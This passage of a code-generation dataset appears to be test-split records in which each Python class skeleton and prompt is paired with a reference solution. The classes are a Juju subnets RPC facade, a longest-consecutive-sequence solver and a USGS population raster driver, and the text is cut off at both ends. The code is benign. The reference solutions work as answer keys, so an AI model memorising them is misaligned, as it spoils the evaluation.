Response(response_code.bind_error, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n", "source": "the_stack_v2_python_sparse", "source_path": "user_app/views/personal_api.py", "source_repo": "lmyfzx/Django-Mall", "split": "test", "star_events_count": 0} {"blob_id": "97ff6f91fd2202e87bbf9d0d1f08b340b27f2fa8", "bodies": ["_params = dict()\nmsg = dict(type='Subnets', request='AllZones', version=5, params=_params)\nreply = await self.rpc(msg)\nreturn reply", "if space_tag is not None and (not isinstance(space_tag, (bytes, str))):\n raise Exception('Expected space_tag to be a str, received: {}'.format(type(space_tag)))\nif zone is not None and (not isinstance(zone, (bytes, str))):\n raise Exception('Expected zone to be a str, received: {}'.format(type(zone)))\n_params = dict()\nmsg = dict(type='Subnets', request='ListSubnets', version=5, params=_params)\n_params['space-tag'] = space_tag\n_params['zone'] = zone\nreply = await self.rpc(msg)\nreturn reply", "if cidrs is not None and (not isinstance(cidrs, (bytes, str, list))):\n raise Exception('Expected cidrs to be a Sequence, received: {}'.format(type(cidrs)))\n_params = dict()\nmsg = dict(type='Subnets', request='SubnetsByCIDR', version=5, params=_params)\n_params['cidrs'] = cidrs\nreply = await self.rpc(msg)\nreturn reply"], "bodies_text": "<|body_start_0|>\n _params = dict()\n msg = dict(type='Subnets', request='AllZones', version=5, params=_params)\n reply = await self.rpc(msg)\n return reply\n<|end_body_0|>\n\n<|body_start_1|>\n if space_tag is not None and (not isinstance(space_tag, (bytes, str))):\n raise Exception('Expected space_tag to be a str, received: {}'.format(type(space_tag)))\n if zone is not None and (not isinstance(zone, (bytes, str))):\n raise Exception('Expected zone to be a str, received: {}'.format(type(zone)))\n _params = dict()\n msg = dict(type='Subnets', request='ListSubnets', version=5, params=_params)\n _params['space-tag'] = space_tag\n _params['zone'] = zone\n reply = await self.rpc(msg)\n return reply\n<|end_body_1|>\n\n<|body_start_2|>\n if cidrs is not None and (not isinstance(cidrs, (bytes, str, list))):\n raise Exception('Expected cidrs to be a Sequence, received: {}'.format(type(cidrs)))\n _params = dict()\n msg = dict(type='Subnets', request='SubnetsByCIDR', version=5, params=_params)\n _params['cidrs'] = cidrs\n reply = await self.rpc(msg)\n return reply\n<|end_body_2|>\n", "class_docstring": "", "class_name": "SubnetsFacade", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SubnetsFacade:\n\n async def AllZones(self):\n \"\"\"AllZones returns all availability zones known to Juju. If a zone is unusable, unavailable, or deprecated the Available field will be false. Returns -> ZoneResults\"\"\"\n <|body_0|>\n\n async def ListSubnets(self, space_tag=None, zone=None):\n \"\"\"ListSubnets returns the matching subnets after applying optional filters. space_tag : str zone : str Returns -> ListSubnetsResults\"\"\"\n <|body_1|>\n\n async def SubnetsByCIDR(self, cidrs=None):\n \"\"\"SubnetsByCIDR returns the collection of subnets matching each CIDR in the input. cidrs : typing.Sequence[str] Returns -> SubnetsResults\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n _params = dict()\n msg = dict(type='Subnets', request='AllZones', version=5, params=_params)\n reply = await self.rpc(msg)\n return reply\n<|end_body_0|>\n\n<|body_start_1|>\n if space_tag is not None and (not isinstance(space_tag, (bytes, str))):\n raise Exception('Expected space_tag to be a str, received: {}'.format(type(space_tag)))\n if zone is not None and (not isinstance(zone, (bytes, str))):\n raise Exception('Expected zone to be a str, received: {}'.format(type(zone)))\n _params = dict()\n msg = dict(type='Subnets', request='ListSubnets', version=5, params=_params)\n _params['space-tag'] = space_tag\n _params['zone'] = zone\n reply = await self.rpc(msg)\n return reply\n<|end_body_1|>\n\n<|body_start_2|>\n if cidrs is not None and (not isinstance(cidrs, (bytes, str, list))):\n raise Exception('Expected cidrs to be a Sequence, received: {}'.format(type(cidrs)))\n _params = dict()\n msg = dict(type='Subnets', request='SubnetsByCIDR', version=5, params=_params)\n _params['cidrs'] = cidrs\n reply = await self.rpc(msg)\n return reply\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000133", "length_bytes": 41639, "license_type": "permissive", "methods": [{"docstring": "AllZones returns all availability zones known to Juju. If a zone is unusable, unavailable, or deprecated the Available field will be false. Returns -> ZoneResults", "name": "AllZones", "signature": "async def AllZones(self)"}, {"docstring": "ListSubnets returns the matching subnets after applying optional filters. space_tag : str zone : str Returns -> ListSubnetsResults", "name": "ListSubnets", "signature": "async def ListSubnets(self, space_tag=None, zone=None)"}, {"docstring": "SubnetsByCIDR returns the collection of subnets matching each CIDR in the input. cidrs : typing.Sequence[str] Returns -> SubnetsResults", "name": "SubnetsByCIDR", "signature": "async def SubnetsByCIDR(self, cidrs=None)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_000530", "prompt": "Implement the Python class `SubnetsFacade` described below.\n\nClass description:\nImplement the SubnetsFacade class.\n\nMethod signatures and docstrings:\n- async def AllZones(self): AllZones returns all availability zones known to Juju. If a zone is unusable, unavailable, or deprecated the Available field will be false. Returns -> ZoneResults\n- async def ListSubnets(self, space_tag=None, zone=None): ListSubnets returns the matching subnets after applying optional filters. space_tag : str zone : str Returns -> ListSubnetsResults\n- async def SubnetsByCIDR(self, cidrs=None): SubnetsByCIDR returns the collection of subnets matching each CIDR in the input. cidrs : typing.Sequence[str] Returns -> SubnetsResults", "prompted_full_text": "Implement the Python class `SubnetsFacade` described below.\n\nClass description:\nImplement the SubnetsFacade class.\n\nMethod signatures and docstrings:\n- async def AllZones(self): AllZones returns all availability zones known to Juju. If a zone is unusable, unavailable, or deprecated the Available field will be false. Returns -> ZoneResults\n- async def ListSubnets(self, space_tag=None, zone=None): ListSubnets returns the matching subnets after applying optional filters. space_tag : str zone : str Returns -> ListSubnetsResults\n- async def SubnetsByCIDR(self, cidrs=None): SubnetsByCIDR returns the collection of subnets matching each CIDR in the input. cidrs : typing.Sequence[str] Returns -> SubnetsResults\n\n<|skeleton|>\nclass SubnetsFacade:\n\n async def AllZones(self):\n \"\"\"AllZones returns all availability zones known to Juju. If a zone is unusable, unavailable, or deprecated the Available field will be false. Returns -> ZoneResults\"\"\"\n <|body_0|>\n\n async def ListSubnets(self, space_tag=None, zone=None):\n \"\"\"ListSubnets returns the matching subnets after applying optional filters. space_tag : str zone : str Returns -> ListSubnetsResults\"\"\"\n <|body_1|>\n\n async def SubnetsByCIDR(self, cidrs=None):\n \"\"\"SubnetsByCIDR returns the collection of subnets matching each CIDR in the input. cidrs : typing.Sequence[str] Returns -> SubnetsResults\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n _params = dict()\n msg = dict(type='Subnets', request='AllZones', version=5, params=_params)\n reply = await self.rpc(msg)\n return reply\n<|end_body_0|>\n\n<|body_start_1|>\n if space_tag is not None and (not isinstance(space_tag, (bytes, str))):\n raise Exception('Expected space_tag to be a str, received: {}'.format(type(space_tag)))\n if zone is not None and (not isinstance(zone, (bytes, str))):\n raise Exception('Expected zone to be a str, received: {}'.format(type(zone)))\n _params = dict()\n msg = dict(type='Subnets', request='ListSubnets', version=5, params=_params)\n _params['space-tag'] = space_tag\n _params['zone'] = zone\n reply = await self.rpc(msg)\n return reply\n<|end_body_1|>\n\n<|body_start_2|>\n if cidrs is not None and (not isinstance(cidrs, (bytes, str, list))):\n raise Exception('Expected cidrs to be a Sequence, received: {}'.format(type(cidrs)))\n _params = dict()\n msg = dict(type='Subnets', request='SubnetsByCIDR', version=5, params=_params)\n _params['cidrs'] = cidrs\n reply = await self.rpc(msg)\n return reply\n<|end_body_2|>\n", "revision_id": "f21bc426952579efb980439f6a07d59bcb4cce0b", "skeleton": "<|skeleton|>\nclass SubnetsFacade:\n\n async def AllZones(self):\n \"\"\"AllZones returns all availability zones known to Juju. If a zone is unusable, unavailable, or deprecated the Available field will be false. Returns -> ZoneResults\"\"\"\n <|body_0|>\n\n async def ListSubnets(self, space_tag=None, zone=None):\n \"\"\"ListSubnets returns the matching subnets after applying optional filters. space_tag : str zone : str Returns -> ListSubnetsResults\"\"\"\n <|body_1|>\n\n async def SubnetsByCIDR(self, cidrs=None):\n \"\"\"SubnetsByCIDR returns the collection of subnets matching each CIDR in the input. cidrs : typing.Sequence[str] Returns -> SubnetsResults\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SubnetsFacade:\n async def AllZones(self):\n \"\"\"AllZones returns all availability zones known to Juju. If a zone is unusable, unavailable, or deprecated the Available field will be false. Returns -> ZoneResults\"\"\"\n _params = dict()\n msg = dict(type='Subnets', request='AllZones', version=5, params=_params)\n reply = await self.rpc(msg)\n return reply\n\n async def ListSubnets(self, space_tag=None, zone=None):\n \"\"\"ListSubnets returns the matching subnets after applying optional filters. space_tag : str zone : str Returns -> ListSubnetsResults\"\"\"\n if space_tag is not None and (not isinstance(space_tag, (bytes, str))):\n raise Exception('Expected space_tag to be a str, received: {}'.format(type(space_tag)))\n if zone is not None and (not isinstance(zone, (bytes, str))):\n raise Exception('Expected zone to be a str, received: {}'.format(type(zone)))\n _params = dict()\n msg = dict(type='Subnets', request='ListSubnets', version=5, params=_params)\n _params['space-tag'] = space_tag\n _params['zone'] = zone\n reply = await self.rpc(msg)\n return reply\n\n async def SubnetsByCIDR(self, cidrs=None):\n \"\"\"SubnetsByCIDR returns the collection of subnets matching each CIDR in the input. cidrs : typing.Sequence[str] Returns -> SubnetsResults\"\"\"\n if cidrs is not None and (not isinstance(cidrs, (bytes, str, list))):\n raise Exception('Expected cidrs to be a Sequence, received: {}'.format(type(cidrs)))\n _params = dict()\n msg = dict(type='Subnets', request='SubnetsByCIDR', version=5, params=_params)\n _params['cidrs'] = cidrs\n reply = await self.rpc(msg)\n return reply\n", "source": "the_stack_v2_python_sparse", "source_path": "juju/client/_client5.py", "source_repo": "juju/python-libjuju", "split": "test", "star_events_count": 63} {"blob_id": "92d897d3613bf38f74ff95557c17964b76e4ba8b", "bodies": ["longest_streak = 0\nnum_set = set(nums)\nfor num in num_set:\n if num - 1 not in num_set:\n current_num = num\n current_streak = 1\n while current_num + 1 in num_set:\n current_num += 1\n current_streak += 1\n longest_streak = max(longest_streak, current_streak)\nreturn longest_streak", "if not nums:\n return 0\nlongest_streak = current_streak = 1\nnums.sort()\nfor i in range(1, len(nums)):\n if nums[i] != nums[i - 1]:\n if nums[i] == nums[i - 1] + 1:\n current_streak += 1\n else:\n longest_streak = max(longest_streak, current_streak)\n current_streak = 1\nreturn max(longest_streak, current_streak)", "longest_streak = 0\nfor num in nums:\n current_num = num\n current_streak = 1\n while current_num + 1 in nums:\n current_num += 1\n current_streak += 1\n longest_streak = max(longest_streak, current_streak)\nreturn longest_streak"], "bodies_text": "<|body_start_0|>\n longest_streak = 0\n num_set = set(nums)\n for num in num_set:\n if num - 1 not in num_set:\n current_num = num\n current_streak = 1\n while current_num + 1 in num_set:\n current_num += 1\n current_streak += 1\n longest_streak = max(longest_streak, current_streak)\n return longest_streak\n<|end_body_0|>\n\n<|body_start_1|>\n if not nums:\n return 0\n longest_streak = current_streak = 1\n nums.sort()\n for i in range(1, len(nums)):\n if nums[i] != nums[i - 1]:\n if nums[i] == nums[i - 1] + 1:\n current_streak += 1\n else:\n longest_streak = max(longest_streak, current_streak)\n current_streak = 1\n return max(longest_streak, current_streak)\n<|end_body_1|>\n\n<|body_start_2|>\n longest_streak = 0\n for num in nums:\n current_num = num\n current_streak = 1\n while current_num + 1 in nums:\n current_num += 1\n current_streak += 1\n longest_streak = max(longest_streak, current_streak)\n return longest_streak\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Sequence", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Sequence:\n\n def find_longest_consecutive(self, nums: List[int]) -> int:\n \"\"\"Approach: Hash Set and Intelligence Sequence Building Time Complexity: O(n) Space Complexity: O(n) :param nums: :return:\"\"\"\n <|body_0|>\n\n def find_longest_consecutive_(self, nums: List[int]) -> int:\n \"\"\"Approach: Sorting Time Complexity: O(n log n) Space Complexity: O(1) :param nums: :return:\"\"\"\n <|body_1|>\n\n def find_longest_consecutive__(self, nums: List[int]) -> int:\n \"\"\"Approach: Brute Force Time Complexity: O(n^3) Space Complexity: O(1) :param nums: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n longest_streak = 0\n num_set = set(nums)\n for num in num_set:\n if num - 1 not in num_set:\n current_num = num\n current_streak = 1\n while current_num + 1 in num_set:\n current_num += 1\n current_streak += 1\n longest_streak = max(longest_streak, current_streak)\n return longest_streak\n<|end_body_0|>\n\n<|body_start_1|>\n if not nums:\n return 0\n longest_streak = current_streak = 1\n nums.sort()\n for i in range(1, len(nums)):\n if nums[i] != nums[i - 1]:\n if nums[i] == nums[i - 1] + 1:\n current_streak += 1\n else:\n longest_streak = max(longest_streak, current_streak)\n current_streak = 1\n return max(longest_streak, current_streak)\n<|end_body_1|>\n\n<|body_start_2|>\n longest_streak = 0\n for num in nums:\n current_num = num\n current_streak = 1\n while current_num + 1 in nums:\n current_num += 1\n current_streak += 1\n longest_streak = max(longest_streak, current_streak)\n return longest_streak\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000134", "length_bytes": 2192, "license_type": "no_license", "methods": [{"docstring": "Approach: Hash Set and Intelligence Sequence Building Time Complexity: O(n) Space Complexity: O(n) :param nums: :return:", "name": "find_longest_consecutive", "signature": "def find_longest_consecutive(self, nums: List[int]) -> int"}, {"docstring": "Approach: Sorting Time Complexity: O(n log n) Space Complexity: O(1) :param nums: :return:", "name": "find_longest_consecutive_", "signature": "def find_longest_consecutive_(self, nums: List[int]) -> int"}, {"docstring": "Approach: Brute Force Time Complexity: O(n^3) Space Complexity: O(1) :param nums: :return:", "name": "find_longest_consecutive__", "signature": "def find_longest_consecutive__(self, nums: List[int]) -> int"}], "n_methods": 3, "prompt": "Implement the Python class `Sequence` described below.\n\nClass description:\nImplement the Sequence class.\n\nMethod signatures and docstrings:\n- def find_longest_consecutive(self, nums: List[int]) -> int: Approach: Hash Set and Intelligence Sequence Building Time Complexity: O(n) Space Complexity: O(n) :param nums: :return:\n- def find_longest_consecutive_(self, nums: List[int]) -> int: Approach: Sorting Time Complexity: O(n log n) Space Complexity: O(1) :param nums: :return:\n- def find_longest_consecutive__(self, nums: List[int]) -> int: Approach: Brute Force Time Complexity: O(n^3) Space Complexity: O(1) :param nums: :return:", "prompted_full_text": "Implement the Python class `Sequence` described below.\n\nClass description:\nImplement the Sequence class.\n\nMethod signatures and docstrings:\n- def find_longest_consecutive(self, nums: List[int]) -> int: Approach: Hash Set and Intelligence Sequence Building Time Complexity: O(n) Space Complexity: O(n) :param nums: :return:\n- def find_longest_consecutive_(self, nums: List[int]) -> int: Approach: Sorting Time Complexity: O(n log n) Space Complexity: O(1) :param nums: :return:\n- def find_longest_consecutive__(self, nums: List[int]) -> int: Approach: Brute Force Time Complexity: O(n^3) Space Complexity: O(1) :param nums: :return:\n\n<|skeleton|>\nclass Sequence:\n\n def find_longest_consecutive(self, nums: List[int]) -> int:\n \"\"\"Approach: Hash Set and Intelligence Sequence Building Time Complexity: O(n) Space Complexity: O(n) :param nums: :return:\"\"\"\n <|body_0|>\n\n def find_longest_consecutive_(self, nums: List[int]) -> int:\n \"\"\"Approach: Sorting Time Complexity: O(n log n) Space Complexity: O(1) :param nums: :return:\"\"\"\n <|body_1|>\n\n def find_longest_consecutive__(self, nums: List[int]) -> int:\n \"\"\"Approach: Brute Force Time Complexity: O(n^3) Space Complexity: O(1) :param nums: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n longest_streak = 0\n num_set = set(nums)\n for num in num_set:\n if num - 1 not in num_set:\n current_num = num\n current_streak = 1\n while current_num + 1 in num_set:\n current_num += 1\n current_streak += 1\n longest_streak = max(longest_streak, current_streak)\n return longest_streak\n<|end_body_0|>\n\n<|body_start_1|>\n if not nums:\n return 0\n longest_streak = current_streak = 1\n nums.sort()\n for i in range(1, len(nums)):\n if nums[i] != nums[i - 1]:\n if nums[i] == nums[i - 1] + 1:\n current_streak += 1\n else:\n longest_streak = max(longest_streak, current_streak)\n current_streak = 1\n return max(longest_streak, current_streak)\n<|end_body_1|>\n\n<|body_start_2|>\n longest_streak = 0\n for num in nums:\n current_num = num\n current_streak = 1\n while current_num + 1 in nums:\n current_num += 1\n current_streak += 1\n longest_streak = max(longest_streak, current_streak)\n return longest_streak\n<|end_body_2|>\n", "revision_id": "65cc78b5afa0db064f9fe8f06597e3e120f7363d", "skeleton": "<|skeleton|>\nclass Sequence:\n\n def find_longest_consecutive(self, nums: List[int]) -> int:\n \"\"\"Approach: Hash Set and Intelligence Sequence Building Time Complexity: O(n) Space Complexity: O(n) :param nums: :return:\"\"\"\n <|body_0|>\n\n def find_longest_consecutive_(self, nums: List[int]) -> int:\n \"\"\"Approach: Sorting Time Complexity: O(n log n) Space Complexity: O(1) :param nums: :return:\"\"\"\n <|body_1|>\n\n def find_longest_consecutive__(self, nums: List[int]) -> int:\n \"\"\"Approach: Brute Force Time Complexity: O(n^3) Space Complexity: O(1) :param nums: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Sequence:\n def find_longest_consecutive(self, nums: List[int]) -> int:\n \"\"\"Approach: Hash Set and Intelligence Sequence Building Time Complexity: O(n) Space Complexity: O(n) :param nums: :return:\"\"\"\n longest_streak = 0\n num_set = set(nums)\n for num in num_set:\n if num - 1 not in num_set:\n current_num = num\n current_streak = 1\n while current_num + 1 in num_set:\n current_num += 1\n current_streak += 1\n longest_streak = max(longest_streak, current_streak)\n return longest_streak\n\n def find_longest_consecutive_(self, nums: List[int]) -> int:\n \"\"\"Approach: Sorting Time Complexity: O(n log n) Space Complexity: O(1) :param nums: :return:\"\"\"\n if not nums:\n return 0\n longest_streak = current_streak = 1\n nums.sort()\n for i in range(1, len(nums)):\n if nums[i] != nums[i - 1]:\n if nums[i] == nums[i - 1] + 1:\n current_streak += 1\n else:\n longest_streak = max(longest_streak, current_streak)\n current_streak = 1\n return max(longest_streak, current_streak)\n\n def find_longest_consecutive__(self, nums: List[int]) -> int:\n \"\"\"Approach: Brute Force Time Complexity: O(n^3) Space Complexity: O(1) :param nums: :return:\"\"\"\n longest_streak = 0\n for num in nums:\n current_num = num\n current_streak = 1\n while current_num + 1 in nums:\n current_num += 1\n current_streak += 1\n longest_streak = max(longest_streak, current_streak)\n return longest_streak\n", "source": "the_stack_v2_python_sparse", "source_path": "data_structures/longest_consecutive_sequence.py", "source_repo": "Shiv2157k/leet_code", "split": "test", "star_events_count": 1} {"blob_id": "6ad0c7e954ef31d126d5e6007ca0e212d1c01f42", "bodies": ["self.lazy_load = lazy_load\nself.fully_loaded = False\nif not pop_directory:\n pop_directory = DEFAULT_POP_DIR\ntiff_path = glob.glob(os.path.join(pop_directory, '*.tif'))\nif not tiff_path:\n raise ValueError('No TIFF file name in directory: %s' % pop_directory)\nself._tiff_path = tiff_path[0]\nself._raster_info = _RasterInfo(self._tiff_path)\nself._raster = np.zeros((self._raster_info.height, self._raster_info.width), dtype=np.uint16)\ndataset = gdal.Open(self._tiff_path)\nraster_band = dataset.GetRasterBand(1)\nself._block_xsize, self._block_ysize = raster_band.GetBlockSize()\ndataset = None\nself._raster_mask = np.zeros((self._raster_info.height // self._block_ysize + 1, self._raster_info.width // self._block_xsize + 1), dtype=np.bool)", "dataset = gdal.Open(self._tiff_path)\nraster_band = dataset.GetRasterBand(1)\nrow_min, row_max = (0, dataset.RasterYSize - 1)\ncol_min, col_max = (0, dataset.RasterXSize - 1)\nif box:\n row_se, col_se = self._raster_info.Indexes(box[0], box[1])\n row_ne, col_ne = self._raster_info.Indexes(box[2], box[1])\n row_sw, col_sw = self._raster_info.Indexes(box[0], box[3])\n row_nw, col_nw = self._raster_info.Indexes(box[2], box[3])\n row_min = max(min(row_ne, row_nw), 0)\n row_max = min(max(row_se, row_sw), dataset.RasterYSize - 1)\n col_min = max(min(col_se, col_ne), 0)\n col_max = min(max(col_sw, col_nw), dataset.RasterXSize - 1)\nb_y_min = int(row_min // self._block_ysize)\nb_y_max = int(row_max // self._block_ysize)\nb_x_min = int(col_min // self._block_xsize)\nb_x_max = int(col_max // self._block_xsize)\nfor b_y in range(b_y_min, b_y_max + 1):\n for b_x in range(b_x_min, b_x_max + 1):\n if self._raster_mask[b_y, b_x]:\n continue\n yoff, xoff = (b_y * self._block_ysize, b_x * self._block_xsize)\n win_xsize, win_ysize = raster_band.GetActualBlockSize(b_x, b_y)\n block = raster_band.ReadAsArray(xoff=xoff, yoff=yoff, win_xsize=win_xsize, win_ysize=win_ysize)\n self._raster[yoff:yoff + win_ysize, xoff:xoff + win_xsize] = np.minimum(block, 65500)\n self._raster_mask[b_y, b_x] = True\nif box is None:\n self.all_loaded = True\ndataset = None", "if len(latitudes) == 0:\n return 0\nlatitudes = np.asarray(latitudes)\nlongitudes = np.asarray(longitudes)\ndensities = np.zeros(len(latitudes), dtype=np.int16)\nrows, cols = self._raster_info.Indexes(latitudes, longitudes)\nidx_inside = np.where((rows >= 0) & (cols >= 0) & (rows < self._raster.shape[0]) & (cols < self._raster.shape[1]))[0]\nif self.lazy_load and (not self.fully_loaded):\n lat_min, lat_max = (np.min(latitudes), np.max(latitudes))\n lon_min, lon_max = (np.min(longitudes), np.max(longitudes))\n self.LoadRaster((lat_min, lon_min, lat_max, lon_max))\ndensities[idx_inside] = self._raster[rows[idx_inside], cols[idx_inside]]\nreturn densities"], "bodies_text": "<|body_start_0|>\n self.lazy_load = lazy_load\n self.fully_loaded = False\n if not pop_directory:\n pop_directory = DEFAULT_POP_DIR\n tiff_path = glob.glob(os.path.join(pop_directory, '*.tif'))\n if not tiff_path:\n raise ValueError('No TIFF file name in directory: %s' % pop_directory)\n self._tiff_path = tiff_path[0]\n self._raster_info = _RasterInfo(self._tiff_path)\n self._raster = np.zeros((self._raster_info.height, self._raster_info.width), dtype=np.uint16)\n dataset = gdal.Open(self._tiff_path)\n raster_band = dataset.GetRasterBand(1)\n self._block_xsize, self._block_ysize = raster_band.GetBlockSize()\n dataset = None\n self._raster_mask = np.zeros((self._raster_info.height // self._block_ysize + 1, self._raster_info.width // self._block_xsize + 1), dtype=np.bool)\n<|end_body_0|>\n\n<|body_start_1|>\n dataset = gdal.Open(self._tiff_path)\n raster_band = dataset.GetRasterBand(1)\n row_min, row_max = (0, dataset.RasterYSize - 1)\n col_min, col_max = (0, dataset.RasterXSize - 1)\n if box:\n row_se, col_se = self._raster_info.Indexes(box[0], box[1])\n row_ne, col_ne = self._raster_info.Indexes(box[2], box[1])\n row_sw, col_sw = self._raster_info.Indexes(box[0], box[3])\n row_nw, col_nw = self._raster_info.Indexes(box[2], box[3])\n row_min = max(min(row_ne, row_nw), 0)\n row_max = min(max(row_se, row_sw), dataset.RasterYSize - 1)\n col_min = max(min(col_se, col_ne), 0)\n col_max = min(max(col_sw, col_nw), dataset.RasterXSize - 1)\n b_y_min = int(row_min // self._block_ysize)\n b_y_max = int(row_max // self._block_ysize)\n b_x_min = int(col_min // self._block_xsize)\n b_x_max = int(col_max // self._block_xsize)\n for b_y in range(b_y_min, b_y_max + 1):\n for b_x in range(b_x_min, b_x_max + 1):\n if self._raster_mask[b_y, b_x]:\n continue\n yoff, xoff = (b_y * self._block_ysize, b_x * self._block_xsize)\n win_xsize, win_ysize = raster_band.GetActualBlockSize(b_x, b_y)\n block = raster_band.ReadAsArray(xoff=xoff, yoff=yoff, win_xsize=win_xsize, win_ysize=win_ysize)\n self._raster[yoff:yoff + win_ysize, xoff:xoff + win_xsize] = np.minimum(block, 65500)\n self._raster_mask[b_y, b_x] = True\n if box is None:\n self.all_loaded = True\n dataset = None\n<|end_body_1|>\n\n<|body_start_2|>\n if len(latitudes) == 0:\n return 0\n latitudes = np.asarray(latitudes)\n longitudes = np.asarray(longitudes)\n densities = np.zeros(len(latitudes), dtype=np.int16)\n rows, cols = self._raster_info.Indexes(latitudes, longitudes)\n idx_inside = np.where((rows >= 0) & (cols >= 0) & (rows < self._raster.shape[0]) & (cols < self._raster.shape[1]))[0]\n if self.lazy_load and (not self.fully_loaded):\n lat_min, lat_max = (np.min(latitudes), np.max(latitudes))\n lon_min, lon_max = (np.min(longitudes), np.max(longitudes))\n self.LoadRaster((lat_min, lon_min, lat_max, lon_max))\n densities[idx_inside] = self._raster[rows[idx_inside], cols[idx_inside]]\n return densities\n<|end_body_2|>\n", "class_docstring": "USGS Population Raster driver. This class manages the reading of population raster data provided by USGS at: https://www.sciencebase.gov/catalog/item/57753ebee4b07dd077c70868", "class_name": "UsgsPopDriver", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass UsgsPopDriver:\n \"\"\"USGS Population Raster driver. This class manages the reading of population raster data provided by USGS at: https://www.sciencebase.gov/catalog/item/57753ebee4b07dd077c70868\"\"\"\n\n def __init__(self, pop_directory=None, lazy_load=False):\n \"\"\"Initializes the driver. Args: pop_directory: The directory holding the USGS population raster. If None, use the default location. lazy_load: If True, then lazy population loading done (as needed).\"\"\"\n <|body_0|>\n\n def LoadRaster(self, box=None):\n \"\"\"Load raster in memory. Args: box: A (lat_min, lon_min, lat_max, lon_max) bounding box. If None, the full raster is loaded in memory.\"\"\"\n <|body_1|>\n\n def GetPopulationDensity(self, latitudes, longitudes):\n \"\"\"Retrieves the population density on locations. Args: latitudes: A sequence of points latitudes. longitudes: A sequence of points longitudes. Returns: The population density (pop/km2) as a ndarray (dtype=int16).\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.lazy_load = lazy_load\n self.fully_loaded = False\n if not pop_directory:\n pop_directory = DEFAULT_POP_DIR\n tiff_path = glob.glob(os.path.join(pop_directory, '*.tif'))\n if not tiff_path:\n raise ValueError('No TIFF file name in directory: %s' % pop_directory)\n self._tiff_path = tiff_path[0]\n self._raster_info = _RasterInfo(self._tiff_path)\n self._raster = np.zeros((self._raster_info.height, self._raster_info.width), dtype=np.uint16)\n dataset = gdal.Open(self._tiff_path)\n raster_band = dataset.GetRasterBand(1)\n self._block_xsize, self._block_ysize = raster_band.GetBlockSize()\n dataset = None\n self._raster_mask = np.zeros((self._raster_info.height // self._block_ysize + 1, self._raster_info.width // self._block_xsize + 1), dtype=np.bool)\n<|end_body_0|>\n\n<|body_start_1|>\n dataset = gdal.Open(self._tiff_path)\n raster_band = dataset.GetRasterBand(1)\n row_min, row_max = (0, dataset.RasterYSize - 1)\n col_min, col_max = (0, dataset.RasterXSize - 1)\n if box:\n row_se, col_se = self._raster_info.Indexes(box[0], box[1])\n row_ne, col_ne = self._raster_info.Indexes(box[2], box[1])\n row_sw, col_sw = self._raster_info.Indexes(box[0], box[3])\n row_nw, col_nw = self._raster_info.Indexes(box[2], box[3])\n row_min = max(min(row_ne, row_nw), 0)\n row_max = min(max(row_se, row_sw), dataset.RasterYSize - 1)\n col_min = max(min(col_se, col_ne), 0)\n col_max = min(max(col_sw, col_nw), dataset.RasterXSize - 1)\n b_y_min = int(row_min // self._block_ysize)\n b_y_max = int(row_max // self._block_ysize)\n b_x_min = int(col_min // self._block_xsize)\n b_x_max = int(col_max // self._block_xsize)\n for b_y in range(b_y_min, b_y_max + 1):\n for b_x in range(b_x_min, b_x_max + 1):\n if self._raster_mask[b_y, b_x]:\n continue\n yoff, xoff = (b_y * self._block_ysize, b_x * self._block_xsize)\n win_xsize, win_ysize = raster_band.GetActualBlockSize(b_x, b_y)\n block = raster_band.ReadAsArray(xoff=xoff, yoff=yoff, win_xsize=win_xsize, win_ysize=win_ysize)\n self._raster[yoff:yoff + win_ysize, xoff:xoff + win_xsize] = np.minimum(block, 65500)\n self._raster_mask[b_y, b_x] = True\n if box is None:\n self.all_loaded = True\n dataset = None\n<|end_body_1|>\n\n<|body_start_2|>\n if len(latitudes) == 0:\n return 0\n latitudes = np.asarray(latitudes)\n longitudes = np.asarray(longitudes)\n densities = np.zeros(len(latitudes), dtype=np.int16)\n rows, cols = self._raster_info.Indexes(latitudes, longitudes)\n idx_inside = np.where((rows >= 0) & (cols >= 0) & (rows < self._raster.shape[0]) & (cols < self._raster.shape[1]))[0]\n if self.lazy_load and (not self.fully_loaded):\n lat_min, lat_max = (np.min(latitudes), np.max(latitudes))\n lon_min, lon_max = (np.min(longitudes), np.max(longitudes))\n self.LoadRaster((lat_min, lon_min, lat_max, lon_max))\n densities[idx_inside] = self._raster[rows[idx_inside], cols[idx_inside]]\n return densities\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000135", "length_bytes": 9295, "license_type": "permissive", "methods": [{"docstring": "Initializes the driver. Args: pop_directory: The directory holding the USGS population raster. If None, use the default location. lazy_load: If True, then lazy population loading done (as needed).", "name": "__init__", "signature": "def __init__(self, pop_directory=None, lazy_load=False)"}, {"docstring": "Load raster in memory. Args: box: A (lat_min, lon_min, lat_max, lon_max) bounding box. If None, the full raster is loaded in memory.", "name": "LoadRaster", "signature": "def LoadRaster(self, box=None)"}, {"docstring": "Retrieves the population density on locations. Args: latitudes: A sequence of points latitudes. longitudes: A sequence of points longitudes. Returns: The population density (pop/km2) as a ndarray (dtype=int16).", "name": "GetPopulationDensity", "signature": "def GetPopulationDensity(self, latitudes, longitudes)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_006272", "prompt": "Implement the Python class `UsgsPopDriver` described below.\n\nClass description:\nUSGS Population Raster driver. This class manages the reading of 